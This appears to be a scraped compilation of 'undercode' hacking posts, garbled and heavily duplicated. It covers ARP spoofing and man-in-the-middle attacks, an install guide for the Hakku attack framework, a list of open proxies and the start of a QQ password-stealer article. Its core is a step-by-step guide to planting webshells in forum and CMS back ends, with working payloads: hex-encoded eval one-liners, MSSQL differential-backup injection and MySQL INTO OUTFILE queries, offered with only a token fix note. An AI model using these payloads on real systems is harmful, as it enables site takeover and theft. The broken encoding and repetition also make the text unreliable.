β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ here dedicate it to everyone. There are still some applications of arp that are discovered by everyone, so will not talk about it in front of everyone.
pinterest.com/undercode_Testing
π¦ππΌπ'π πππΈβπ :
1) The arp --ddos attack is actually sending a large number of normal AR
P request packets continuously, which consumes the host bandwidth. This kind of attack is not too significant in the local area network. The data packet is a normal packet and will not be filtered by the arp firewall and switch.
2) This solution, I do not limit the traffic in some switches, I will not do it, I don't know the feasibility, I personally think it is difficult to protect A ++++
> arp return packet spoofing
3)This kind of spoofing is the most common kind of spoofing. It is to send arp return data packets to the host.This packet uses the IP as the gateway address, and the physical address of the sending end is its own or forged, so that the other party's computer's IP-MAC address There is an error in the table.When the IP message adds this hardware address to the data and sends, it will appear that the correct physical exit address cannot be found.
4) This kind of protection is relatively simple. ARP -S is used to bind the gateway, and there is also arp firewall, but this spoofing may be overwritten by the correct address sent by the router.
> arp request spoofing
> ARP request spoofing is also relatively common. It is arp's request protocol. There is no error in the destination IP and MAC address. The error is that the requester's MAC address is problematic and is not true. This kind of spoofing and return spoofing are only OP values. different.
π¦ The protection method is the same as above :
1) arp whole network request spoofing
This kind of spoofing is a further extension of request spoofing and return spoofing.The principle is to change the target address of the Ethernet frame header to FF-FF-FF-FF-FF-FF is to broadcast to all hosts, source address IP address or gateway IP The address and physical address are fake MAC addresses, remember that in the destination IP, it is the 192.168.1.255 multicast address.
> This protection method is the same as above, and the entire network blocking function of software such as network law enforcement is implemented in this way.
2) arp man-in-the-middle
This kind of spoofing is carried out under the switch.Some people say that the data flow under the switching environment is safe.The following attack method is directed at the switch.
> The general process is like this, ABC three computers, A and C communicate normally, B initiates an intermediate attack, B first sends arp spoofing to tell A that I B is C, and then tells C that I B is A. So between A and C B's data transmission process was completely viewed by B, and it was a bit sloppy.This kind of deception also needs a data forwarding mechanism, otherwise the communication between A and C will be broken, such as the P2P terminator is this kind of deception
3) arpIP address conflict
The P address conflict is also caused by the ARP data packet.He just broadcasts the Ethernet frame header address.The source IP address and the destination IP address in the packet are the same.This kind of packet is very common, and everyone may not know it every time. When your PC is turned on, he will broadcast his IP address to see if any computer uses the same IP address. This broadcast is defined as "free arp"
> This kind of broadcast can be filtered directly with the arp firewall. In fact, this kind of packet will not cause a network disconnection, but it will always pop up an annoying dialog box. For example, there is a kind of packet sending such a longhorn network monitoring.
4) arp gateway spoofing
π¦ here dedicate it to everyone. There are still some applications of arp that are discovered by everyone, so will not talk about it in front of everyone.
pinterest.com/undercode_Testing
π¦ππΌπ'π πππΈβπ :
1) The arp --ddos attack is actually sending a large number of normal AR
P request packets continuously, which consumes the host bandwidth. This kind of attack is not too significant in the local area network. The data packet is a normal packet and will not be filtered by the arp firewall and switch.
2) This solution, I do not limit the traffic in some switches, I will not do it, I don't know the feasibility, I personally think it is difficult to protect A ++++
> arp return packet spoofing
3)This kind of spoofing is the most common kind of spoofing. It is to send arp return data packets to the host.This packet uses the IP as the gateway address, and the physical address of the sending end is its own or forged, so that the other party's computer's IP-MAC address There is an error in the table.When the IP message adds this hardware address to the data and sends, it will appear that the correct physical exit address cannot be found.
4) This kind of protection is relatively simple. ARP -S is used to bind the gateway, and there is also arp firewall, but this spoofing may be overwritten by the correct address sent by the router.
> arp request spoofing
> ARP request spoofing is also relatively common. It is arp's request protocol. There is no error in the destination IP and MAC address. The error is that the requester's MAC address is problematic and is not true. This kind of spoofing and return spoofing are only OP values. different.
π¦ The protection method is the same as above :
1) arp whole network request spoofing
This kind of spoofing is a further extension of request spoofing and return spoofing.The principle is to change the target address of the Ethernet frame header to FF-FF-FF-FF-FF-FF is to broadcast to all hosts, source address IP address or gateway IP The address and physical address are fake MAC addresses, remember that in the destination IP, it is the 192.168.1.255 multicast address.
> This protection method is the same as above, and the entire network blocking function of software such as network law enforcement is implemented in this way.
2) arp man-in-the-middle
This kind of spoofing is carried out under the switch.Some people say that the data flow under the switching environment is safe.The following attack method is directed at the switch.
> The general process is like this, ABC three computers, A and C communicate normally, B initiates an intermediate attack, B first sends arp spoofing to tell A that I B is C, and then tells C that I B is A. So between A and C B's data transmission process was completely viewed by B, and it was a bit sloppy.This kind of deception also needs a data forwarding mechanism, otherwise the communication between A and C will be broken, such as the P2P terminator is this kind of deception
3) arpIP address conflict
The P address conflict is also caused by the ARP data packet.He just broadcasts the Ethernet frame header address.The source IP address and the destination IP address in the packet are the same.This kind of packet is very common, and everyone may not know it every time. When your PC is turned on, he will broadcast his IP address to see if any computer uses the same IP address. This broadcast is defined as "free arp"
> This kind of broadcast can be filtered directly with the arp firewall. In fact, this kind of packet will not cause a network disconnection, but it will always pop up an annoying dialog box. For example, there is a kind of packet sending such a longhorn network monitoring.
4) arp gateway spoofing
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
This kind of spoofing is an extension from another method of spoofing. If the client is statically bound to the gateway and you install an arp firewall, you cannot spoof it or disconnect it from the Internet, then we will spoof the gateway. For example, A is the client and B is the server. A has done protection and you want to block him from accessing the Internet, so we deceive B by thinking that B is a computer and send him the false address of A all the time. Be bigger
5) arp switch spoofing {skiller}
This attack method has only been available in the past two years, and it is relatively simple to tell you now. I have never seen this attack method before. The principle may be more difficult to understand, and it is very troublesome to protect. If you attack me, now I can't help it at least.
π¦ The principle is to change the forwarding list of the switch.
1) arp switch spoofing attack ideas
The switch forwards according to the source and destination address frame headers of the Ethernet arp protocol.For example, A is at port 1 of the switch, and the gateway is at port 3.The switch goes out of port 3 according to the destination address sent by A. Why is it In this way, because the switch maintains a dynamic address list inside, there is a comparison table of MAC addresses and physical ports.If this table is static, it is not known whether this attack will take effect.
> First of all, the method I implemented is this, three PCs a, b, c. The attacker is C. If I want to block the host B, send an arp address request packet from B to A on the C computer, this packet is continuous Continuously, then B is blocked, why is that, B's request data can be sent out, the data packet he returns will be transferred to the C computer by the switch, the three-way handshake link is not established successfully, and the network will be Block, we can do a lot of things according to this idea, here is not an example, I am so hungry I don't write about eating.
π¦ Continue when you are full ...
Seeing here, my friends are a little dazed. In fact, it is very simple. Using Fengyun firewall is a wise choice. The above normal methods of deception must first know your IP and MAC. After opening Fengyun's security mode, it will only respond to the gateway. The request is like it does not exist for other hosts on the LAN. If the other party wants to ping and you want ARP scanning, you are in vain. If you do nβt think you do nβt exist, you ca nβt talk about the attack. ..
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
5) arp switch spoofing {skiller}
This attack method has only been available in the past two years, and it is relatively simple to tell you now. I have never seen this attack method before. The principle may be more difficult to understand, and it is very troublesome to protect. If you attack me, now I can't help it at least.
π¦ The principle is to change the forwarding list of the switch.
1) arp switch spoofing attack ideas
The switch forwards according to the source and destination address frame headers of the Ethernet arp protocol.For example, A is at port 1 of the switch, and the gateway is at port 3.The switch goes out of port 3 according to the destination address sent by A. Why is it In this way, because the switch maintains a dynamic address list inside, there is a comparison table of MAC addresses and physical ports.If this table is static, it is not known whether this attack will take effect.
> First of all, the method I implemented is this, three PCs a, b, c. The attacker is C. If I want to block the host B, send an arp address request packet from B to A on the C computer, this packet is continuous Continuously, then B is blocked, why is that, B's request data can be sent out, the data packet he returns will be transferred to the C computer by the switch, the three-way handshake link is not established successfully, and the network will be Block, we can do a lot of things according to this idea, here is not an example, I am so hungry I don't write about eating.
π¦ Continue when you are full ...
Seeing here, my friends are a little dazed. In fact, it is very simple. Using Fengyun firewall is a wise choice. The above normal methods of deception must first know your IP and MAC. After opening Fengyun's security mode, it will only respond to the gateway. The request is like it does not exist for other hosts on the LAN. If the other party wants to ping and you want ARP scanning, you are in vain. If you do nβt think you do nβt exist, you ca nβt talk about the attack. ..
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Hakku Framework?
Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. Hakku is under MIT license, in other words you can do what you ever want with the source code.
Fb.com/UndercodeTesting
π¦FEATURES :
apache_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen
π¦ OS support
==========
Linux supported, and developed on/for linux
OS X support not planned
Windows support not planned
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/4shadoww/hakkuframework.git
2) cd hakkuframework
3) sudo ./install -i
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Hakku Framework?
Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. Hakku is under MIT license, in other words you can do what you ever want with the source code.
Fb.com/UndercodeTesting
π¦FEATURES :
apache_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen
π¦ OS support
==========
Linux supported, and developed on/for linux
OS X support not planned
Windows support not planned
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/4shadoww/hakkuframework.git
2) cd hakkuframework
3) sudo ./install -i
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦common methods of taking webshell in the background :
t.me/UndercodeTesting
1) Direct upload to get webshell
> This kind of program for php and jsp is relatively common. MolyX BOARD is one of them. Upload the .php type directly in the mood icon management. Although there is no prompt, it is actually successful. The uploaded file url should be http: // forums / images Under / smiles /, the jsp system vulnerability of Lianzhong game station and Netease can upload the jsp file directly.
> The file name is the original file name, and the .php file can be uploaded directly in the backend of bo-blog. There is a prompt for the path of the uploaded file. And the upfile.asp vulnerability that was very popular a year ago (Dynamic Web 5.0 and 6.0, many early whole-site systems), due to the inefficient filtering of uploaded files, users can directly upload webshell to any writable directory on the website, so as to get The site's administrator controls permissions.
2) Second, add and modify the upload type
> Now many script program upload modules are not only allowed to upload legal file types, but most systems are allowed to add upload types, bbsxp background can add asa | asP type, ewebeditor background can also add asa type, after modification, we can directly I uploaded the asa suffixed webshell, and there is a case where the .asp is filtered. You can add the .aspasp file type to upload and get the webshell.
> In the background of the php system, we can add the upload type of .php.g1f, which is a feature of php, as long as the last one is not a known file type, php will normally run php.g1f as .php, thus You can also get a shell successfully. LeadBbs3.14 get webshell in the background: add asp to the upload type. Note that there is a space after the asp, and then upload the ASP horse in the foreground, of course, add a space in the back!
3) Three, use the background management function to write to the webshell
> The uploading vulnerability is basically completed, so we can write the webshell by modifying the relevant files after entering the background. Typical comparisons are dvbbs6.0, and leadbbs2.88, etc., directly modify the configuration file in the background, write the file with the suffix asp. Another method for LeadBbs3.14 to get a webshell in the background is to add a new friendship link and write the ice horse minimum horse on the site name. Enter some characters before and after the minimum horse, http: \\ website \ inc \ IncHtm \ BoardLink.asp is the shell we want.
4) Fourth, use the background management to write webshell to the configuration file
Use the "" "": "" // "and other symbols to construct the configuration file of the minimum horse writing program, joekoe forum, XX student records, boiling outlook news system, COCOON Counter statistical program, etc., and many php programs , COCOON Counter statistical program example, add cnhacker at 263 dot net ": eval request (chr (35)) // in the management mailbox, in the preparation file is webmail =" cnhacker at 263 dot net \ ": eval request (chr (35)) // ",
5) Five, asp + mssql system
It is necessary to mention the mssql version of the moving network, but it can be directly submitted locally for backup. First upload a fake picture with asp code in the post, and then remember the upload path. Write a locally submitted form, the code is as follows:
6) Save as .htm to execute locally. Fill in the upload path of the fake image in the "location of the uploaded file", fill in the relative path of the WebShell you want to back up in the "location to be copied to", and submit to get our lovely WebShell, the recovery code is similar to this, Just modify the relevant places.
> I haven't encountered a relatively powerful asp program background that executes the mssql command in the background. The database restoration and backup of the dynamic network is a decoration. I can't execute the sql command to back up the webshell. I can only execute some simple query commands.
π¦common methods of taking webshell in the background :
t.me/UndercodeTesting
1) Direct upload to get webshell
> This kind of program for php and jsp is relatively common. MolyX BOARD is one of them. Upload the .php type directly in the mood icon management. Although there is no prompt, it is actually successful. The uploaded file url should be http: // forums / images Under / smiles /, the jsp system vulnerability of Lianzhong game station and Netease can upload the jsp file directly.
> The file name is the original file name, and the .php file can be uploaded directly in the backend of bo-blog. There is a prompt for the path of the uploaded file. And the upfile.asp vulnerability that was very popular a year ago (Dynamic Web 5.0 and 6.0, many early whole-site systems), due to the inefficient filtering of uploaded files, users can directly upload webshell to any writable directory on the website, so as to get The site's administrator controls permissions.
2) Second, add and modify the upload type
> Now many script program upload modules are not only allowed to upload legal file types, but most systems are allowed to add upload types, bbsxp background can add asa | asP type, ewebeditor background can also add asa type, after modification, we can directly I uploaded the asa suffixed webshell, and there is a case where the .asp is filtered. You can add the .aspasp file type to upload and get the webshell.
> In the background of the php system, we can add the upload type of .php.g1f, which is a feature of php, as long as the last one is not a known file type, php will normally run php.g1f as .php, thus You can also get a shell successfully. LeadBbs3.14 get webshell in the background: add asp to the upload type. Note that there is a space after the asp, and then upload the ASP horse in the foreground, of course, add a space in the back!
3) Three, use the background management function to write to the webshell
> The uploading vulnerability is basically completed, so we can write the webshell by modifying the relevant files after entering the background. Typical comparisons are dvbbs6.0, and leadbbs2.88, etc., directly modify the configuration file in the background, write the file with the suffix asp. Another method for LeadBbs3.14 to get a webshell in the background is to add a new friendship link and write the ice horse minimum horse on the site name. Enter some characters before and after the minimum horse, http: \\ website \ inc \ IncHtm \ BoardLink.asp is the shell we want.
4) Fourth, use the background management to write webshell to the configuration file
Use the "" "": "" // "and other symbols to construct the configuration file of the minimum horse writing program, joekoe forum, XX student records, boiling outlook news system, COCOON Counter statistical program, etc., and many php programs , COCOON Counter statistical program example, add cnhacker at 263 dot net ": eval request (chr (35)) // in the management mailbox, in the preparation file is webmail =" cnhacker at 263 dot net \ ": eval request (chr (35)) // ",
5) Five, asp + mssql system
It is necessary to mention the mssql version of the moving network, but it can be directly submitted locally for backup. First upload a fake picture with asp code in the post, and then remember the upload path. Write a locally submitted form, the code is as follows:
6) Save as .htm to execute locally. Fill in the upload path of the fake image in the "location of the uploaded file", fill in the relative path of the WebShell you want to back up in the "location to be copied to", and submit to get our lovely WebShell, the recovery code is similar to this, Just modify the relevant places.
> I haven't encountered a relatively powerful asp program background that executes the mssql command in the background. The database restoration and backup of the dynamic network is a decoration. I can't execute the sql command to back up the webshell. I can only execute some simple query commands.
7) You can use mssql to inject a differential backup webshell. Generally, the background shows the absolute path. As long as you have an injection point, you can basically make a differential backup. The following is the main statement code of differential backup. You can use the injection vulnerability of DynamicNet 7.0 to backup a webshell with differential. You can use the method mentioned above to backup the conn.asp file to a .txt file to obtain the library name.
π¦ The main code of differential backup:
8) declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x626273 backup database @a to disk = @
s--; Drop table [heige]; create table [dbo] dot [heige ] ([cmd] [image])-
; insert into heige (cmd) values ββ(0x3C2565786563757465207265717565737428226C2229253E)-
; declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x643A5C7765625C312E617370 backup database @a to disk = @ s WITH DIFFERENTIAL, FORMAT--
9) In this code, 0x626273 is the hexadecimal of the library name bbs to be backed up, which can be other names such as bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E is the hexadecimal, which is the lp minimum horse; 0x643A5C7765625C312E617370 is d: \ web \ 1. asp hex, which is the webshell path you want to back up.
10) Of course, you can also use the more common backup method to obtain the webshell. The only shortcoming is that the backed up files are too large. If the backup database has a download-proof data table, or there is an incorrect asp code, the backed up webshell will not succeed. Running, using differential backup is a method with a high success rate, and greatly reduces the size of backup files.
11) Six, php + mysql system
The background needs to have mysql data query function, we can use it to execute SELECT ... INTO OUTFILE query output php file, because all the data is stored in mysql, so we can insert our webshell code into mysql by normal means Use the SELECT ... INTO OUTFILE statement to export the shell. Enter select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile 'path' in mysql operation to get a minimum horse
12) 0x3C3F6576616C 28245F504F53545B615D293B3F3E is our hexadecimal, this method is more common for phpmyadmin, first use the path of phpmyadmin to leak the vulnerability, the more typical one is http: //url/phpmyadmin/libra9xiaoes/select_lang.lib.php.
13) You can expose the path, it is easier to expose the absolute path in the php environment :). It is mentioned that when encountering mysql under the win system, the path should be written as d: \\ wwwroot \\ a.php. The following method is a more commonly used method of exporting webshell. You can also write a vbs script to add the system administrator to export to the startup folder. An administrator account will be added after the system restarts.
14) CREATE TABLE a (cmd text NOT NULL)
INSERT INTO a (cmd) VALUES ('")?>')
Select cmd from a into outfile 'path / b.php'
DROP TABLE IF EXISTS a
Accessing b.php will generate a minimum horse.
15) It is much simpler if you can execute the php command. The typical representative is BO-BLOG. Enter the following code in the php command box in the background:
$ sa = fopen ("./ up / saiy.php", "w");
fw9xiaote ($ sa, "");
fclose ($ sa);
?>
16) It will generate the smallest php Trojan with the content named saey.php in the up directory,
π¦Finally, use the lanker client to connect. In actual use, it is necessary to consider whether the folder has write permission. Or enter such a code ")?> Will generate a minimum horse of a.php in the current directory.
17) Three ways for the phpwind forum to go from the background to the webshell
Method 1 template method
18) Enter the background, set the style template, and write the code on a random line. Remember, this code must be written against the left line, and there can be no characters in front of the code.
EOT;
eval ($ a);
p9xiaont <<
19) Then get a shell for http: //website/bbs/index.php.
Founder 2 Swearing filtering method
π¦ The main code of differential backup:
8) declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x626273 backup database @a to disk = @
s--; Drop table [heige]; create table [dbo] dot [heige ] ([cmd] [image])-
; insert into heige (cmd) values ββ(0x3C2565786563757465207265717565737428226C2229253E)-
; declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x643A5C7765625C312E617370 backup database @a to disk = @ s WITH DIFFERENTIAL, FORMAT--
9) In this code, 0x626273 is the hexadecimal of the library name bbs to be backed up, which can be other names such as bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E is the hexadecimal, which is the lp minimum horse; 0x643A5C7765625C312E617370 is d: \ web \ 1. asp hex, which is the webshell path you want to back up.
10) Of course, you can also use the more common backup method to obtain the webshell. The only shortcoming is that the backed up files are too large. If the backup database has a download-proof data table, or there is an incorrect asp code, the backed up webshell will not succeed. Running, using differential backup is a method with a high success rate, and greatly reduces the size of backup files.
11) Six, php + mysql system
The background needs to have mysql data query function, we can use it to execute SELECT ... INTO OUTFILE query output php file, because all the data is stored in mysql, so we can insert our webshell code into mysql by normal means Use the SELECT ... INTO OUTFILE statement to export the shell. Enter select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile 'path' in mysql operation to get a minimum horse
12) 0x3C3F6576616C 28245F504F53545B615D293B3F3E is our hexadecimal, this method is more common for phpmyadmin, first use the path of phpmyadmin to leak the vulnerability, the more typical one is http: //url/phpmyadmin/libra9xiaoes/select_lang.lib.php.
13) You can expose the path, it is easier to expose the absolute path in the php environment :). It is mentioned that when encountering mysql under the win system, the path should be written as d: \\ wwwroot \\ a.php. The following method is a more commonly used method of exporting webshell. You can also write a vbs script to add the system administrator to export to the startup folder. An administrator account will be added after the system restarts.
14) CREATE TABLE a (cmd text NOT NULL)
INSERT INTO a (cmd) VALUES ('")?>')
Select cmd from a into outfile 'path / b.php'
DROP TABLE IF EXISTS a
Accessing b.php will generate a minimum horse.
15) It is much simpler if you can execute the php command. The typical representative is BO-BLOG. Enter the following code in the php command box in the background:
$ sa = fopen ("./ up / saiy.php", "w");
fw9xiaote ($ sa, "");
fclose ($ sa);
?>
16) It will generate the smallest php Trojan with the content named saey.php in the up directory,
π¦Finally, use the lanker client to connect. In actual use, it is necessary to consider whether the folder has write permission. Or enter such a code ")?> Will generate a minimum horse of a.php in the current directory.
17) Three ways for the phpwind forum to go from the background to the webshell
Method 1 template method
18) Enter the background, set the style template, and write the code on a random line. Remember, this code must be written against the left line, and there can be no characters in front of the code.
EOT;
eval ($ a);
p9xiaont <<
19) Then get a shell for http: //website/bbs/index.php.
Founder 2 Swearing filtering method
Enter safety management β Bad word filtering. Add bad words to write a '] =' aa '; eval ($ _ POST [' a ']); //
20) Replace with where you can write at will, and then get a shell address http: //website/bbs/data/bbscache/wordsfb.php.
Method 3 User level management
Newly established member groups, you can write titles casually, but do nβt write special symbols with single or double quotation marks, write a '; eval ($ _ POST [' a ']); Then get a shell address http: //website/bbs/data/bbscache/level.php.
21) The above three ways to get webshellr's password is a, which is a backdoor server for Lanker.
> You can also use the website access counting system records to obtain webshell
22) The most obvious is the Ajiang counting program in a private server program, which can be directly submitted through http: //website/stat.asp? Style = text & referer = code content & screenwidth = 1024, you can insert the code content directly into the database of the counting system Medium, and the default database of this system is count # .asa,
23) we can access the webshell through http: //website/count%23.asa. Since the Ajiang counting program filters% and +, the minimum horse is changed to replace the code content Submit at the place, and then use the eval client of lake2 to submit. It is worth mentioning that if you enter the counting background, you can clean up the data at a certain moment. Once the insertion of the asp Trojan fails, you can clean up the database and operate again.
π¦solution
Because there are many versions of the code involved in this article, it is impossible to provide a perfect solution. Those who are capable can make appropriate repairs to the vulnerability file mentioned in this article. If the vulnerability file does not affect the use of the system, the file can also be deleted. If you don't fix it, you can download the latest patch from the relevant official website for repair and update. At the same time, please also pay attention to the latest announcements issued by major security networks, and notify the official website in time if you find related vulnerabilities.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
20) Replace with where you can write at will, and then get a shell address http: //website/bbs/data/bbscache/wordsfb.php.
Method 3 User level management
Newly established member groups, you can write titles casually, but do nβt write special symbols with single or double quotation marks, write a '; eval ($ _ POST [' a ']); Then get a shell address http: //website/bbs/data/bbscache/level.php.
21) The above three ways to get webshellr's password is a, which is a backdoor server for Lanker.
> You can also use the website access counting system records to obtain webshell
22) The most obvious is the Ajiang counting program in a private server program, which can be directly submitted through http: //website/stat.asp? Style = text & referer = code content & screenwidth = 1024, you can insert the code content directly into the database of the counting system Medium, and the default database of this system is count # .asa,
23) we can access the webshell through http: //website/count%23.asa. Since the Ajiang counting program filters% and +, the minimum horse is changed to replace the code content Submit at the place, and then use the eval client of lake2 to submit. It is worth mentioning that if you enter the counting background, you can clean up the data at a certain moment. Once the insertion of the asp Trojan fails, you can clean up the database and operate again.
π¦solution
Because there are many versions of the code involved in this article, it is impossible to provide a perfect solution. Those who are capable can make appropriate repairs to the vulnerability file mentioned in this article. If the vulnerability file does not affect the use of the system, the file can also be deleted. If you don't fix it, you can download the latest patch from the relevant official website for repair and update. At the same time, please also pay attention to the latest announcements issued by major security networks, and notify the official website in time if you find related vulnerabilities.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ELITE FRESH PROXIES
167.86.66.178 3128 1 hour ago
3347 ms 46% (51) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
1194 ms 11% (74) fr France Elite -
101.231.104.82 80 1 hour ago
1002 ms 70% (46) cn China - Shanghai Elite -
79.137.44.85 3129 1 hour ago
2617 ms 58% (50) es Spain - Madrid Elite -
103.216.82.200 6666 1 hour ago
3870 ms 12% (79) in India - Ahmedabad Elite -
103.216.82.216 6666 1 hour ago
3982 ms 10% (75) in India - Ahmedabad Elite -
108.74.113.180 80 1 hour ago
746 ms 48% (55) us United States - Atlanta Elite -
47.91.44.217 8000 1 hour ago
2133 ms 31% (52) au Australia - Melbourne Elite -
176.9.221.34 808 1 hour ago
2179 ms 19% (69) de Germany Elite -
177.91.111.233 8080 1 hour ago
3371 ms 17% (67) br Brazil - Bom Jesus da Lapa Elite -
185.72.27.12 8080 1 hour ago
3144 ms 9% (80) ir Iran Elite -
194.67.92.81 3128 1 hour ago
4208 ms 6% (85) ru Russia Elite -
118.24.89.206 1080 1 hour ago
3881 ms 9% (59) cn China Elite -
144.76.214.158 1080 1 hour ago
3052 ms 73% (43) de Germany Elite -
159.8.114.34 8123 1 hour ago
431 ms 92% (37) fr France - Clichy Elite -
140.227.174.216 1000 1 hour ago
2315 ms 12% (67) jp Japan Elite -
173.192.128.238 25 1 hour ago
153 ms 100% (33) us United States - Seattle Elite -
173.192.128.238 9999 1 hour ago
150 ms 100% (36) us United States - Seattle Elite -
64.227.126.95 3128 1 hour ago
1289 ms 22% (65) us United States - Jacksonville Elite -
62.213.14.166 8080 1 hour ago
3244 ms 25% (64) ru Russia - Samara Elite -
103.119.54.188 8888 1 hour ago
3221 ms 15% (74) cn China Elite -
103.216.82.28 6666 1 hour ago
3452 ms 8% (68) in India - Ahmedabad Elite -
213.6.136.150 8080 1 hour ago
3230 ms 17% (71) ps Palestinian Territories - Gaza Elite -
36.89.8.235 8080 1 hour ago
4558 ms 7% (78) id Indonesia Elite -
51.255.103.170 3129 1 hour ago
2916 ms 38% (70) gb United Kingdom Elite -
155.93.240.101 8080 1 hour ago
2217 ms 40% (46) za South Africa - Brackenfell Elite -
151.237.175.183 80 1 hour ago
4331 ms 24% (64) ru Russia - Novokuznetsk Elite -
178.128.211.134 6868 1 hour ago
1134 ms 65% (28) gr Greece Elite -
185.108.141.114 8080 1 hour ago
3630 ms 7% (79) bg Bulgaria Elite -
103.250.166.17 6666 1 hour ago
4328 ms 9% (78) in India - Gandhidham Elite -
103.247.216.114 8080 1 hour ago
3978 ms 11% (82) id Indonesia - Jakarta Elite -
122.226.57.70 8888 1 hour ago
942 ms 34% (51) cn China Elite -
113.254.134.196 8118 1 hour ago
835 ms 5% (71) hk Hong Kong - Central Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ELITE FRESH PROXIES
167.86.66.178 3128 1 hour ago
3347 ms 46% (51) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
1194 ms 11% (74) fr France Elite -
101.231.104.82 80 1 hour ago
1002 ms 70% (46) cn China - Shanghai Elite -
79.137.44.85 3129 1 hour ago
2617 ms 58% (50) es Spain - Madrid Elite -
103.216.82.200 6666 1 hour ago
3870 ms 12% (79) in India - Ahmedabad Elite -
103.216.82.216 6666 1 hour ago
3982 ms 10% (75) in India - Ahmedabad Elite -
108.74.113.180 80 1 hour ago
746 ms 48% (55) us United States - Atlanta Elite -
47.91.44.217 8000 1 hour ago
2133 ms 31% (52) au Australia - Melbourne Elite -
176.9.221.34 808 1 hour ago
2179 ms 19% (69) de Germany Elite -
177.91.111.233 8080 1 hour ago
3371 ms 17% (67) br Brazil - Bom Jesus da Lapa Elite -
185.72.27.12 8080 1 hour ago
3144 ms 9% (80) ir Iran Elite -
194.67.92.81 3128 1 hour ago
4208 ms 6% (85) ru Russia Elite -
118.24.89.206 1080 1 hour ago
3881 ms 9% (59) cn China Elite -
144.76.214.158 1080 1 hour ago
3052 ms 73% (43) de Germany Elite -
159.8.114.34 8123 1 hour ago
431 ms 92% (37) fr France - Clichy Elite -
140.227.174.216 1000 1 hour ago
2315 ms 12% (67) jp Japan Elite -
173.192.128.238 25 1 hour ago
153 ms 100% (33) us United States - Seattle Elite -
173.192.128.238 9999 1 hour ago
150 ms 100% (36) us United States - Seattle Elite -
64.227.126.95 3128 1 hour ago
1289 ms 22% (65) us United States - Jacksonville Elite -
62.213.14.166 8080 1 hour ago
3244 ms 25% (64) ru Russia - Samara Elite -
103.119.54.188 8888 1 hour ago
3221 ms 15% (74) cn China Elite -
103.216.82.28 6666 1 hour ago
3452 ms 8% (68) in India - Ahmedabad Elite -
213.6.136.150 8080 1 hour ago
3230 ms 17% (71) ps Palestinian Territories - Gaza Elite -
36.89.8.235 8080 1 hour ago
4558 ms 7% (78) id Indonesia Elite -
51.255.103.170 3129 1 hour ago
2916 ms 38% (70) gb United Kingdom Elite -
155.93.240.101 8080 1 hour ago
2217 ms 40% (46) za South Africa - Brackenfell Elite -
151.237.175.183 80 1 hour ago
4331 ms 24% (64) ru Russia - Novokuznetsk Elite -
178.128.211.134 6868 1 hour ago
1134 ms 65% (28) gr Greece Elite -
185.108.141.114 8080 1 hour ago
3630 ms 7% (79) bg Bulgaria Elite -
103.250.166.17 6666 1 hour ago
4328 ms 9% (78) in India - Gandhidham Elite -
103.247.216.114 8080 1 hour ago
3978 ms 11% (82) id Indonesia - Jakarta Elite -
122.226.57.70 8888 1 hour ago
942 ms 34% (51) cn China Elite -
113.254.134.196 8118 1 hour ago
835 ms 5% (71) hk Hong Kong - Central Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦In-depth analysis of how hackers steal QQ :
t.me/UndercodeTesting
If you provoke it, the OICQ password may be leaked before you know it. Even more frightening is that it will send the password to the Internet, so hackers don't have to work hard on your machine. The thing that the hacking team will introduce today is GOP (Get Oicq Password).
1) First, analyze the use settings of the Trojan
As the saying goes, "Know yourselves and know each other, you can't fight a hundred battles." To prevent GOP attacks, you must first understand its operating mechanism.
